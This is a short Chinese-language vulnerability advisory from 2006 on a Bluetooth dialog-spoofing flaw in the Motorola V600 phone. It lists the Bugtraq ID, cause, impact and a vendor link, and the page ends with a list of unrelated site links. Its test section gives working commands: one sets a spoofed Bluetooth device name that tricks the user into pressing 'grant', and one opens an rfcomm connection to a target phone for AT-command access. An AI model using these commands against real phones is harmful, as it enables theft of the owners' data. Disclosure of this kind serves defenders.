Motorola蓝牙接口存在对话框伪造漏洞

漏洞信息

Motorola V600支持蓝牙功能。

Motorola V600蓝牙接收存在对话框伪造问题，远程攻击者可以利用漏洞获得敏感信息。

当接收到蓝牙通信时，攻击者可利用该问题诱使用户进入AT访问设备，可借此获得敏感信息。

BUGTRAQ ID: 17190

CNCAN ID:CNCAN-2006032305

漏洞消息时间:2006-03-22

漏洞起因

输入验证错误

影响系统

Motorola V600

危害

远程攻击者可以利用漏洞获得敏感信息。

攻击所需条件

攻击者必须可以访问Motorola V600。

测试方法

# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'`

# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)

Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3

Press CTRL-C for hangup

厂商解决方案

联系供应商获得补丁方案：

http://www.motorola.com/motoinfo/product/details/0,,11,00.html

漏洞提供者

Kevin Finisterre

漏洞消息链接

http://marc.theaimsgroup.com/?l=bugtraq&m=114304846013066&w=2

漏洞消息标题

DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline

• ·钦定四库全书荟要-白氏长庆集|报价￥87.80
• ·钦定四库全书荟要-宛陵集(钦定四库全书荟要)|
• ·钦定四库全书荟要-词综|报价￥39.80|图书
• ·SQL注入高级技巧nowthk篇
• ·黑客如何实现网络过载攻击深度解析
• ·钦定四库全书荟要-遵岩集|报价￥63.80|图
• ·美诞生黑客训练营研究黑客技术知己知彼
• ·布屎和CNN绝对精彩！
• ·近期间谍软件横行又一变种软件出现
• ·十个探测SQLServer2000漏洞的技巧或